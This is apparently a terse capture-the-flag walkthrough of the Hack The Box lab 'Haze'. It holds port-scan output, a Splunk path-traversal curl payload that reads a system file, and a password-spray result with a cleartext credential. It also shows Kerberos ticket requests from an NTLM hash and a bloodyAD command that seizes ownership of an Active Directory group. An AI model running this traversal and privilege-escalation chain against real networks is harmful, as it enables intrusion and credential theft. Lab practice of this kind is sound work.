$ rustscan --ulimit 10000 -a 10.129.12.198 -- -A -sC.----. .-. .-. .----..---. .----. .---. .--. .-. .-.{} }{ } |{ {__ {_ _}{ {__ / ___} / {} \ `|.-. \{_} |.-._} } .-._} }\ }/ /\ \|\ |`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-`[~] Automatically increasing ulimit value to 10000.Open 10.129.12.198:53Open 10.129.12.198:88Open 10.129.12.198:135Open 10.129.12.198:139Open 10.129.12.198:389Open 10.129.12.198:445Open 10.129.12.198:464Open 10.129.12.198:593Open 10.129.12.198:636Open 10.129.12.198:3268Open 10.129.12.198:3269Open 10.129.12.198:5985Open 10.129.12.198:8000Open 10.129.12.198:8089Open 10.129.12.198:8088Open 10.129.12.198:9389Open 10.129.12.198:47001Open 10.129.12.198:49664Open 10.129.12.198:49667Open 10.129.12.198:49668Open 10.129.12.198:49674Open 10.129.12.198:49666Open 10.129.12.198:49683Open 10.129.12.198:49665Open 10.129.12.198:49685Open 10.129.12.198:50396Open 10.129.12.198:50403Open 10.129.12.198:50412Open 10.129.12.198:50429PORT STATE SERVICE REASON VERSION53/tcp open domain syn-ack ttl 127 Simple DNS Plus88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-04 12:53:13Z)135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)|_ssl-date: TLS randomness does not represent timessl-cert: Subject: commonName=dc01.haze.htbSubject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htbIssuer: commonName=haze-DC01-CA/domainComponent=haze445/tcp open microsoft-ds? syn-ack ttl 127464/tcp open kpasswd5? syn-ack ttl 127593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)|\_ssl-date: TLS randomness does not represent timessl-cert: Subject: commonName=dc01.haze.htbSubject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htbIssuer: commonName=haze-DC01-CA/domainComponent=haze3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)|\_ssl-date: TLS randomness does not represent timessl-cert: Subject: commonName=dc01.haze.htbSubject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htbIssuer: commonName=haze-DC01-CA/domainComponent=haze3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)|\_ssl-date: TLS randomness does not represent timessl-cert: Subject: commonName=dc01.haze.htbSubject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htbIssuer: commonName=haze-DC01-CA/domainComponent=haze5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|\_http-server-header: Microsoft-HTTPAPI/2.0|\_http-title: Not Found8000/tcp open http syn-ack ttl 127 Splunkd httpd|\_http-favicon: Unknown favicon MD5: E60C968E8FF3CC2F4FB869588E83AFC6http-title: Site doesn`t have a title (text/html; charset=UTF-8).|\_Requested resource was http://10.129.12.198:8000/en-US/account/login?return_to=%2Fen-US%2Fhttp-robots.txt: 1 disallowed entry|_/http-methods:|_ Supported Methods: GET HEAD POST OPTIONS|\_http-server-header: Splunkd8088/tcp open ssl/http syn-ack ttl 127 Splunkd httpd|\_http-title: 404 Not Foundssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUserIssuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US/localityName=San Francisco/emailAddress=support@splunk.com|\_http-server-header: Splunkdhttp-methods:|_ Supported Methods: GET POST HEAD OPTIONShttp-robots.txt: 1 disallowed entry|_/8089/tcp open ssl/http syn-ack ttl 127 Splunkd httpdhttp-robots.txt: 1 disallowed entry|_/|_http-title: splunkdssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUserIssuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US/localityName=San Francisco/emailAddress=support@splunk.com|\_http-server-header: Splunkdhttp-methods:|_ Supported Methods: GET HEAD OPTIONS9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|\_http-server-header: Microsoft-HTTPAPI/2.0|\_http-title: Not Found49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC49674/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC49683/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.049685/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC50396/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC50403/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC50412/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC50429/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPCHost script results:|_clock-skew: 59m52s
Modify /etc/hosts
$ echo "10.129.12.198 haze.htb dc01.haze.htb" sudo tee -a /etc/hosts
$ curl "http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Windows/system32/drivers/etc/hosts"# Copyright (c) 1993-2009 Microsoft Corp.## This is a sample HOSTS file used by Microsoft TCP/IP for Windows.## This file contains the mappings of IP addresses to host names. Each# entry should be kept on an individual line. The IP address should# be placed in the first column followed by the corresponding host name.# The IP address and the host name should be separated by at least one# space.## Additionally, comments (such as these) may be inserted on individual# lines or following the machine name denoted by a '#' symbol.## For example:## 102.54.94.97 rhino.acme.com # source server# 38.25.63.10 x.acme.com # x client host# localhost name resolution is handled within DNS itself.# 127.0.0.1 localhost# ::1 localhost
Not much we can do as Paul, but password spray shows valid pass for mark.adams
Run again as mark.adams (bloodhound will actually work when loaded)
[+] Testing WinRM access...WINRM 10.129.12.198 5985 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0. arc4 = algorithms.ARC4(self._key)WINRM 10.129.12.198 5985 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)
Use hash to get ticket → change owner Support_Services
$ getTGT.py -hashes :a70df6599d5eab1502b38f9c1c3fd828 haze.htb/Haze-IT-Backup$Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies[*] Saving ticket in Haze-IT-Backup$.ccache$ export KRB5CCNAME=Haze-IT-Backup$.ccache$ bloodyAD --host dc01.haze.htb --dc-ip 10.129.12.198 -d haze.htb -k set owner "SUPPORT_SERVICES" 'Haze-IT-Backup$'[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on SUPPORT_SERVICES